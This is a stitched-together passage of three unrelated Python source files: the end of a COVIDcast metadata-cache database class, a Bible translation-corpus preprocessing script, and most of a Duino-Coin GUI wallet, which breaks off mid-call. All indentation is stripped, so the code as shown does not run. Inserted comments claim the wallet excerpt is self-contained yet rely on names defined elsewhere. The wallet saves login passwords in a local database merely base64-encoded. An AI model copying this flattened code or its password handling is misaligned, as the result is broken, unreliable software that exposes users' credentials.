# sort the metadata because threaded workers return results in nondeterministic order
sorting_fields = "data_source signal time_type geo_type".split()
sortable_fields_fn = lambda x: [(field, x[field]) for field in sorting_fields]
prepended_sortables_fn = lambda x: sortable_fields_fn(x) + list(x.items())
tuple_representation = list(map(prepended_sortables_fn, meta))
tuple_representation.sort()
meta = list(map(dict, tuple_representation)) # back to dict form
return meta
def update_covidcast_meta_cache(self, metadata):
"""Updates the `covidcast_meta_cache` table."""
sql = '''
UPDATE
`covidcast_meta_cache`
SET
`timestamp` = UNIX_TIMESTAMP(NOW()),
`epidata` = %s
'''
epidata_json = json.dumps(metadata)
self._cursor.execute(sql, (epidata_json,))
def retrieve_covidcast_meta_cache(self):
"""Useful for viewing cache entries (was used in debugging)"""
sql = '''
SELECT `epidata`
FROM `covidcast_meta_cache`
ORDER BY `timestamp` DESC
LIMIT 1;
'''
self._cursor.execute(sql)
cache_json = self._cursor.fetchone()[0]
cache = json.loads(cache_json)
cache_hash = {}
for entry in cache:
cache_hash[(entry['data_source'], entry['signal'], entry['time_type'], entry['geo_type'])] = entry
return cache_hash
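# End-to-end sketch of the metadata cache flow defined above (illustrative only):
#   meta = db.get_covidcast_meta()               # threaded per-(source, signal) aggregation
#   db.update_covidcast_meta_cache(meta)         # store the JSON blob in covidcast_meta_cache
#   cached = db.retrieve_covidcast_meta_cache()  # dict keyed by (data_source, signal, time_type, geo_type)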
|
prepare_bible.py
|
#!/usr/bin/env python3
from subprocess import run
from threading import Thread
import os
import shutil
import sys
import osis_tran
SCRIPTS = 'mosesdecoder/scripts'
TOKENIZER = SCRIPTS + '/tokenizer/tokenizer.perl'
CLEAN = SCRIPTS + '/training/clean-corpus-n.perl'
BPEROOT = 'subword-nmt'
BPE_TOKENS = 30000
CLEAN_RATIO = 1.5
PREP = 'bible.prep'
TMP = PREP + '/tmp'
BPE_CODE = PREP + '/code'
# starts with * --> unidecode
MODULES = [
'*2TGreek', 'Afr1953', 'Alb', 'BasHautin', '*Bela', 'BretonNT', '*BulVeren',
'*CSlElizabeth', 'Chamorro', '*ChiNCVs', 'Cro', 'CzeCEP', 'DaOT1931NT1907',
'*Dari', 'DutSVV', 'ESV2011', 'Esperanto', 'Est', '*FarTPV', 'FrePGR',
'FinPR', 'GerNeUe', '*GreVamvas', 'Haitian', '*HebModern', '*HinERV',
'HunUj', 'ItaRive', 'Kekchi', '*KorHKJV', 'LtKBB', 'LvGluck8', 'ManxGaelic',
'Maori', 'Mg1865', 'Norsk', 'NorthernAzeri', '*Peshitta', 'PolUGdanska',
'PorAlmeida1911', 'PotLykins', 'RomCor', '*RusSynodal', 'ScotsGaelic',
'SloStritar', 'SomKQA', 'SpaRV', 'Swahili', 'SweFolk1998', 'TagAngBiblia',
'TurHADI', '*Ukrainian', 'Vulgate'
]
TRAIN_STARTS = {
'ESV2011': 'Matt.',
'FinPR': 'Exod.',
'GerNeUe': 'Exod.'
}
SRC_TOKEN_EXTRA_WEIGHT = 2
TARGET_EXTRA_PASSES = 2
TARGETS = list(TRAIN_STARTS)
SRC='2TGreek'
GLOSSARIES = ['TGT_' + m.lstrip('*') for m in MODULES] + ['TGT_TEMPLATE']
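# The TGT_* tokens above implement a simple multi-target scheme: every source line is
# prefixed with a tag naming its target module (see the gen_trans loops in main()), and
# the tags are passed to apply_bpe.py as glossaries so BPE never splits them.
# Illustrative tagged source line (the text itself is hypothetical):
#   TGT_FinPR εν αρχη ην ο λογος ...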
def apply_bpe(fname):
with open(TMP + '/' + fname) as inf:
with open(PREP + '/' + fname, 'w') as outf:
CMD = (['python', BPEROOT+'/apply_bpe.py', '--glossaries'] + GLOSSARIES +
['-c', BPE_CODE])
run(CMD, stdin=inf, stdout=outf, check=True)
def main():
modnames = [x.lstrip('*') for x in MODULES]
assert SRC in modnames
assert not (set(TRAIN_STARTS) - set(modnames)), (set(TRAIN_STARTS) - set(modnames))
assert not (set(TARGETS) - set(modnames)), (set(TARGETS) - set(modnames))
shutil.rmtree(PREP, ignore_errors=True)
os.mkdir(PREP)
os.mkdir(TMP)
if not os.path.exists('mosesdecoder'):
print('ERROR: Directory "mosesdecoder" does not exist.', file=sys.stderr)
print('Did you git clone without --recurse-submodules?', file=sys.stderr)
sys.exit(1)
train_mods = {}
val_mods = {}
print('Loading modules...')
for m in MODULES:
print(m, end=' ', flush=True)
decode = False
if m[0] == '*':
decode = True
m = m[1:]
train_mod = osis_tran.load_osis_module(m, toascii=decode)
if m in TRAIN_STARTS:
val_mod, train_mod = osis_tran.split_at_key(TRAIN_STARTS[m], train_mod)
val_mods[m] = val_mod
train_mods[m] = train_mod
print()
src_mod = train_mods[SRC]
del train_mods[SRC]
src_data = []
tgt_data = []
for tgt_mod in train_mods:
passes = 1
if tgt_mod in TARGETS:
passes += TARGET_EXTRA_PASSES
for i in range(passes):
for src_line, tgt_line in osis_tran.gen_trans(src_mod, train_mods[tgt_mod]):
src_data.append('TGT_' + tgt_mod + ' ' + src_line)
tgt_data.append(tgt_line)
val_src_data = []
val_tgt_data = []
for tgt_mod in val_mods:
for src_line, tgt_line in osis_tran.gen_trans(src_mod, val_mods[tgt_mod]):
val_src_data.append('TGT_' + tgt_mod + ' ' + src_line)
val_tgt_data.append(tgt_line)
print('Preprocessing train data...')
with open(TMP + '/protect', 'w') as f:
print('TGT_[a-zA-Z0-9]+', file=f)
# For BPE, learn source language only 1+SRC_TOKEN_EXTRA_WEIGHT times.
with open(TMP + '/src-once', 'w') as f:
for i in range(1+SRC_TOKEN_EXTRA_WEIGHT):
print('\n'.join(src_mod.values()), file=f)
# Also create a file for the source exactly once - it's useful down the road
src_template = ['TGT_TEMPLATE ' + x for x in src_mod.values()]
for data, fname in [(src_data, 'tok.src'), (tgt_data, 'tok.tgt'),
(val_src_data, 'val.src'), (val_tgt_data, 'val.tgt'),
(src_template, 'src-template')]:
CMD = ['perl', TOKENIZER, '-threads', '8', '-protected',
TMP+'/protect', '-l', 'nosuchlanguage']
with open(TMP + '/' + fname, 'w') as f:
run(CMD, input='\n'.join(data), stdout=f, check=True, encoding='utf-8')
for s, d in [('tok', 'train'), ('val', 'valid')]:
CMD = ['perl', CLEAN, '-ratio', str(CLEAN_RATIO), TMP+'/'+s, 'src', 'tgt',
TMP + '/' + d, '1', '175']
run(CMD, check=True)
run('cat {tmp}/src-once {tmp}/train.tgt >{tmp}/train.both'.format(tmp=TMP),
shell=True, check=True)
print('Learning BPE...')
with open(TMP + '/train.both') as inf:
with open(BPE_CODE, 'w') as outf:
run(['python', BPEROOT + '/' + 'learn_bpe.py', '-s', str(BPE_TOKENS)],
stdin=inf, stdout=outf, check=True)
threads = []
for l in ('src', 'tgt'):
for s in ('train', 'valid'):
fname = s + '.' + l
print('apply_bpe.py to ' + fname + '...')
th = Thread(target=apply_bpe, args=[fname])
th.start()
threads.append(th)
print('apply_bpe.py to src-template...')
th = Thread(target=apply_bpe, args=['src-template'])
th.start()
threads.append(th)
for t in threads:
t.join()
# FIXME proper test set
shutil.copy(PREP + '/valid.src', PREP + '/test.src')
shutil.copy(PREP + '/valid.tgt', PREP + '/test.tgt')
if __name__ == '__main__':
main()
|
Wallet.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Tkinter GUI Wallet (v2.4)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
import sys
from base64 import b64decode, b64encode
from configparser import ConfigParser
from datetime import datetime
from json import loads
from json import loads as jsonloads
from locale import getdefaultlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from socket import socket
from sqlite3 import connect as sqlconn
from subprocess import check_call
from threading import Thread, Timer
from time import sleep, time
from tkinter import (BOTH, END, LEFT, RIGHT, Button, Checkbutton, E, Entry,
Frame, IntVar, Label, Listbox, N, PhotoImage, S,
Scrollbar, StringVar, Tk, Toplevel, W, messagebox, ttk)
from tkinter.font import Font
from urllib.request import urlopen, urlretrieve
from webbrowser import open_new_tab
from requests import get
# NOTE: the helpers below also rely on the following names; they are imported in the
# full wallet source and are added here so that this excerpt resolves on its own.
# Fernet tokens are urlsafe base64, hence the b64e/b64d aliases. Tron-related names
# used further down (TRONPY_ENABLED, PrivateKey, wduco) are defined elsewhere in the
# full file and are not redeclared here.
from base64 import urlsafe_b64encode as b64e, urlsafe_b64decode as b64d
import secrets
from PIL import Image, ImageTk
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
# Version number
VERSION = 2.4
# Colors
BACKGROUND_COLOR = "#121212"
FONT_COLOR = "#fffdee"
FOREGROUND_COLOR = "#ff9f43"
FOREGROUND_COLOR_SECONDARY = "#fdcb6e"
# Minimum transaction amount to be saved
MIN_TRANSACTION_VALUE = 0.00000000001
# Minimum transaction amount to show a notification
MIN_TRANSACTION_VALUE_NOTIFY = 0.5
# Resources folder location
resources = "Wallet_" + str(VERSION) + "_resources/"
ENCRYPTION_ITERATIONS = 100_000
config = ConfigParser()
wrong_passphrase = False
global_balance = 0
oldbalance = 0
balance = 0
unpaid_balance = 0
profitCheck = 0
curr_bal = 0
def install(package):
check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def get_duco_price():
global duco_fiat_value
jsonapi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if jsonapi.status_code == 200:
try:
content = jsonapi.content.decode()
contentjson = loads(content)
duco_fiat_value = round(float(contentjson["Duco price"]), 4)
except Exception:
duco_fiat_value = 0.003
else:
duco_fiat_value = 0.003
Timer(30, get_duco_price).start()
def title(title):
if osname == "nt":
system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def _derive_key(
password: bytes,
salt: bytes,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=ENCRYPTION_ITERATIONS,
backend=backend)
return b64e(kdf.derive(password))
def password_encrypt(
message: bytes,
password: str,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return b64e(
b"%b%b%b" % (
salt,
ENCRYPTION_ITERATIONS.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(message))))
def password_decrypt(
token: bytes,
password: str) -> bytes:
decoded = b64d(token)
salt, ENCRYPTION_ITERATIONS, token = decoded[:16], decoded[16:20], b64e(
decoded[20:])
ENCRYPTION_ITERATIONS = int.from_bytes(ENCRYPTION_ITERATIONS, "big")
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return Fernet(key).decrypt(token)
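# Round-trip sketch for the helpers above (illustrative; the token layout produced by
# password_encrypt is salt | iteration count | Fernet ciphertext):
#   token = password_encrypt(b"my private key", "passphrase")
#   assert password_decrypt(token, "passphrase") == b"my private key"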
def get_string(string_name):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def openTos(handler):
open_new_tab("https://github.com/revoxhere/duino-coin#terms-of-usage")
def openGitHub(handler):
open_new_tab("https://github.com/revoxhere/duino-coin")
def openWebsite(handler):
open_new_tab("https://duinocoin.com")
def openExchange(handler):
open_new_tab("https://revoxhere.github.io/duco-exchange/")
def openDiscord(handler):
open_new_tab("https://discord.com/invite/kvBkccy")
def openTransaction(hashToOpen):
open_new_tab("https://explorer.duinocoin.com/?search="+str(hashToOpen))
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
master.title("Login")
master.resizable(False, False)
TEXT_FONT_BOLD = Font(size=12, weight="bold")
TEXT_FONT = Font(size=12, weight="normal")
self.duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
self.duco.image = self.duco
self.ducoLabel = Label(
self, background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=self.duco)
self.ducoLabel2 = Label(
self,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("welcome_message"),
font=TEXT_FONT_BOLD)
self.spacer = Label(self)
self.label_username = Label(
self,
text=get_string("username"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.label_password = Label(
self,
text=get_string("passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.entry_username = Entry(
self,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.entry_password = Entry(
self,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.ducoLabel.grid(
row=0,
sticky="nswe",
pady=(5, 0),
padx=(5))
self.ducoLabel2.grid(
row=1,
sticky="nswe",
padx=(5))
self.label_username.grid(
row=4,
sticky=W,
pady=(5, 0))
self.entry_username.grid(
row=5,
sticky=N,
padx=(5))
self.label_password.grid(
row=6,
sticky=W)
self.entry_password.grid(
row=7,
sticky=N)
self.logbtn = Button(
self,
text=get_string("login"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._login_btn_clicked,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(5, 1))
self.regbtn = Button(
self,
text=get_string("register"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._register_btn_clicked,
font=TEXT_FONT_BOLD)
self.regbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(0, 5))
self.configure(background=BACKGROUND_COLOR)
self.master.bind(
"<Return>",
self._login_btn_clicked_bind)
self.pack()
def _login_btn_clicked_bind(self, event):
self._login_btn_clicked()
def _login_btn_clicked(self):
global username, password
username = self.entry_username.get()
password = self.entry_password.get()
if username and password:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(64).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
passwordEnc = b64encode(bytes(password, encoding="utf8"))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO
UserData(username, password, useWrapper)
VALUES(?, ?, ?)""",
(username, passwordEnc, "False"))
con.commit()
root.destroy()
else:
messagebox.showerror(
title=get_string("login_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("login_error"),
message=get_string("fill_the_blanks_warning"))
def _registerprotocol(self):
emailS = email.get()
usernameS = username.get()
passwordS = password.get()
confpasswordS = confpassword.get()
if emailS and usernameS and passwordS and confpasswordS:
if passwordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"REGI,"
+ str(usernameS)
+ ","
+ str(passwordS)
+ ","
+ str(emailS),
encoding="utf8"))
response = soc.recv(128).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
messagebox.showinfo(
title=get_string("registration_success"),
message=get_string("registration_success_msg"))
register.destroy()
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("register_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("fill_the_blanks_warning"))
def _register_btn_clicked(self):
global username, password, confpassword, email, register
root.destroy()
register = Tk()
register.title(get_string("register"))
register.resizable(False, False)
TEXT_FONT_BOLD = Font(
register,
size=12,
weight="bold")
TEXT_FONT = Font(
register,
size=12,
weight="normal")
tos_warning = get_string("register_tos_warning")
import textwrap
tos_warning = textwrap.dedent(tos_warning)
tos_warning = "\n".join(l for line in tos_warning.splitlines()
for l in textwrap.wrap(line, width=20))
duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
duco.image = duco
ducoLabel = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=duco)
ducoLabel.grid(
row=0,
padx=5,
pady=(5, 0),
sticky="nswe")
ducoLabel2 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("register_on_network"),
font=TEXT_FONT_BOLD)
ducoLabel2.grid(row=1,
padx=5,
sticky="nswe")
def colorLabelBlue(handler):
ducoLabel3.configure(foreground="#6c5ce7")
def colorLabelNormal(handler):
ducoLabel3.configure(foreground=FONT_COLOR)
ducoLabel3 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=tos_warning,
font=TEXT_FONT)
ducoLabel3.grid(
row=2,
padx=5,
sticky="nswe")
ducoLabel3.bind("<Button-1>", openTos)
ducoLabel3.bind("<Enter>", colorLabelBlue)
ducoLabel3.bind("<Leave>", colorLabelNormal)
Label(
register,
text=get_string("username").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=3,
sticky=W,
padx=5,
pady=(5, 0))
username = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
username.grid(
row=4,
padx=5)
Label(
register,
text=get_string("passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=5,
sticky=W,
padx=5)
password = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
password.grid(
row=6,
padx=5)
Label(
register,
text=get_string("confirm_passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=7,
sticky=W,
padx=5)
confpassword = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
confpassword.grid(
row=8,
padx=5)
Label(
register,
text=get_string("email").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=9,
sticky=W,
padx=5)
email = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
email.grid(
row=10,
padx=5)
self.logbtn = Button(
register,
text=get_string("register"),
activebackground=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
command=self._registerprotocol,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5, 5),
pady=(5, 5))
register.configure(background=BACKGROUND_COLOR)
def loading_window():
global loading, status
loading = Tk()
loading.resizable(False, False)
loading.configure(background=BACKGROUND_COLOR)
loading.title(get_string("loading"))
try:
loading.iconphoto(True,
PhotoImage(file=resources + "duco_color.png"))
except Exception:
pass
TEXT_FONT = Font(loading,
size=10,
weight="bold")
TEXT_FONT_BOLD = Font(loading,
size=14,
weight="bold")
original = Image.open(resources + "duco_color.png")
resized = original.resize((128, 128), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(loading,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(row=0,
column=0,
sticky=N + S + E + W,
pady=(5, 0),
padx=(5))
Label(
loading,
text=get_string("duino_coin_wallet"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=1,
column=0,
sticky=S + W,
pady=(5, 0),
padx=5)
loading.update()
status = Label(
loading,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("loading_database"),
font=TEXT_FONT)
status.grid(
row=2,
column=0,
sticky=S + W,
pady=(0, 5),
padx=5)
loading.update()
def transactions_window(handler):
transactionsWindow = Toplevel()
transactionsWindow.resizable(False, False)
transactionsWindow.title(get_string("wallet_transactions"))
transactionsWindow.transient([root])
transactionsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
transactionsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
transactionsWindow,
size=12,
weight="normal")
Label(
transactionsWindow,
text=get_string("transaction_list"),
font=TEXT_FONT_BOLD_LARGE,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
Label(
transactionsWindow,
text=get_string("transaction_list_notice"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
listbox = Listbox(
transactionsWindow,
width="35",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
listbox.grid(
row=2,
column=0,
sticky=S + W + N + E,
padx=(5, 0),
pady=(0, 5))
scrollbar = Scrollbar(transactionsWindow,
background=BACKGROUND_COLOR)
scrollbar.grid(
row=2,
column=1,
sticky=N + S,
padx=(0, 5),
pady=(0, 5))
for i in gtxl:
listbox.insert(END, gtxl[i]["Sender"] + " to " + gtxl[i]
["Recipient"] + ": " + str(gtxl[i]["Amount"]) + " DUCO")
def get_selection(event):
try:
selection = listbox.curselection()[0]
openTransaction(gtxl[str(selection)]["Hash"])
except IndexError:
pass
listbox.bind("<Button-1>", get_selection)
listbox.config(yscrollcommand=scrollbar.set, font=TEXT_FONT)
scrollbar.config(command=listbox.yview)
def currency_converter_calc():
fromcurrency = fromCurrencyInput.get(fromCurrencyInput.curselection())
tocurrency = toCurrencyInput.get(toCurrencyInput.curselection())
amount = amountInput.get()
# TODO
value = duco_fiat_value * float(amount)
result = get_string("result") + ": " + str(round(value, 6))
conversionresulttext.set(str(result))
calculatorWindow.update()
def currency_converter_window(handler):
global conversionresulttext
global fromCurrencyInput
global toCurrencyInput
global amountInput
global calculatorWindow
calculatorWindow = Toplevel()
calculatorWindow.resizable(False, False)
calculatorWindow.title(get_string("wallet_calculator"))
calculatorWindow.transient([root])
calculatorWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(
calculatorWindow,
size=12,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
calculatorWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
calculatorWindow,
size=12,
weight="normal")
Label(
calculatorWindow,
text=get_string("currency_converter"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
columnspan=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Label(
calculatorWindow,
text=get_string("from"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=0,
sticky=S + W,
padx=5)
fromCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
font=TEXT_FONT,
foreground=FONT_COLOR,
width="20",
height="13",
)
fromCurrencyInput.grid(row=2,
column=0,
sticky=S + W,
padx=(5, 0))
fromCurrencyInput.insert(0, "DUCO")
vsb = Scrollbar(
calculatorWindow,
orient="vertical",
command=fromCurrencyInput.yview,
background=BACKGROUND_COLOR,
)
vsb.grid(row=2,
column=1,
sticky="ns",
padx=(0, 5))
fromCurrencyInput.configure(yscrollcommand=vsb.set)
fromCurrencyInput.select_set(0)
fromCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("to"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=3,
columnspan=2,
sticky=S + W,
padx=5)
toCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
foreground=FONT_COLOR,
font=TEXT_FONT,
width="20",
height="13")
toCurrencyInput.grid(
row=2,
column=3,
sticky=S + W,
padx=(5, 0))
toCurrencyInput.insert(0, "USD")
vsb2 = Scrollbar(
calculatorWindow,
orient="vertical",
command=toCurrencyInput.yview,
background=BACKGROUND_COLOR,)
vsb2.grid(
row=2,
column=4,
sticky="ns",
padx=(0, 5))
toCurrencyInput.configure(yscrollcommand=vsb2.set)
toCurrencyInput.select_set(0)
toCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("input_amount"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=3,
columnspan=2,
column=0,
sticky=S + W,
padx=5)
def clear_ccamount_placeholder(self):
amountInput.delete("0", "100")
amountInput = Entry(
calculatorWindow,
foreground=FOREGROUND_COLOR_SECONDARY,
border="0",
font=TEXT_FONT,
background=BACKGROUND_COLOR,)
amountInput.grid(
row=4,
column=0,
sticky=N + S + W + E,
padx=5,
columnspan=2,
pady=(0, 5))
amountInput.insert("0", str(global_balance))
amountInput.bind("<FocusIn>", clear_ccamount_placeholder)
Button(
calculatorWindow,
text=get_string("calculate"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
background=BACKGROUND_COLOR,
command=currency_converter_calc,
).grid(row=3,
columnspan=2,
column=2,
sticky=N + S + W + E,
pady=(5, 0),
padx=5)
conversionresulttext = StringVar(calculatorWindow)
conversionresulttext.set(get_string("result") + ": 0.0")
conversionresultLabel = Label(
calculatorWindow,
textvariable=conversionresulttext,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,)
conversionresultLabel.grid(
row=4,
columnspan=2,
column=2,
pady=(0, 5))
calculatorWindow.mainloop()
def statistics_window(handler):
statsApi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if statsApi.status_code == 200: # Check for response
statsApi = statsApi.json()
statsWindow = Toplevel()
statsWindow.resizable(False, False)
statsWindow.title(get_string("statistics_title"))
statsWindow.transient([root])
statsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
statsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
statsWindow,
size=12,
weight="normal")
Active_workers_listbox = Listbox(
statsWindow,
exportselection=False,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
border="0",
font=TEXT_FONT,
width="65",
height="8",)
Active_workers_listbox.grid(
row=1,
columnspan=2,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
i = 0
totalHashrate = 0
for threadid in statsApi["Miners"]:
if username in statsApi["Miners"][threadid]["User"]:
rigId = statsApi["Miners"][threadid]["Identifier"]
if rigId == "None":
rigId = ""
else:
rigId += ": "
software = statsApi["Miners"][threadid]["Software"]
hashrate = str(round(statsApi["Miners"][threadid]["Hashrate"], 2))
totalHashrate += float(hashrate)
difficulty = str(statsApi["Miners"][threadid]["Diff"])
shares = (
str(statsApi["Miners"][threadid]["Accepted"])
+ "/"
+ str(
statsApi["Miners"][threadid]["Accepted"]
+ statsApi["Miners"][threadid]["Rejected"]))
Active_workers_listbox.insert(
i,
"#"
+ str(i + 1)
+ ": "
+ rigId
+ software
+ " "
+ str(round(float(hashrate) / 1000, 2))
+ " kH/s @ diff "
+ difficulty
+ ", "
+ shares)
i += 1
if i == 0:
Active_workers_listbox.insert(
i, get_string("statistics_miner_warning"))
totalHashrateString = str(int(totalHashrate)) + " H/s"
if totalHashrate > 1000000000:
totalHashrateString = str(
round(totalHashrate / 1000000000, 2)) + " GH/s"
elif totalHashrate > 1000000:
totalHashrateString = str(round(totalHashrate / 1000000, 2)) + " MH/s"
elif totalHashrate > 1000:
totalHashrateString = str(round(totalHashrate / 1000, 2)) + " kH/s"
Active_workers_listbox.configure(height=i)
Active_workers_listbox.select_set(32)
Active_workers_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("your_miners") + " - " + totalHashrateString,
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=5,
padx=5)
Label(
statsWindow,
text=get_string("richlist"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Top_10_listbox = Listbox(
statsWindow,
exportselection=False,
border="0",
font=TEXT_FONT,
width="30",
height="10",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
Top_10_listbox.grid(
row=3,
column=0,
rowspan=10,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
for i in statsApi["Top 10 richest miners"]:
Top_10_listbox.insert(i, statsApi["Top 10 richest miners"][i])
Top_10_listbox.select_set(32)
Top_10_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("network_info"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=2,
column=1,
sticky=S + W,
padx=5,
pady=5)
Label(
statsWindow,
text=get_string("difficulty")
+ ": "
+ str(statsApi["Current difficulty"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=3,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_blocks")
+ ": "
+ str(statsApi["Mined blocks"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
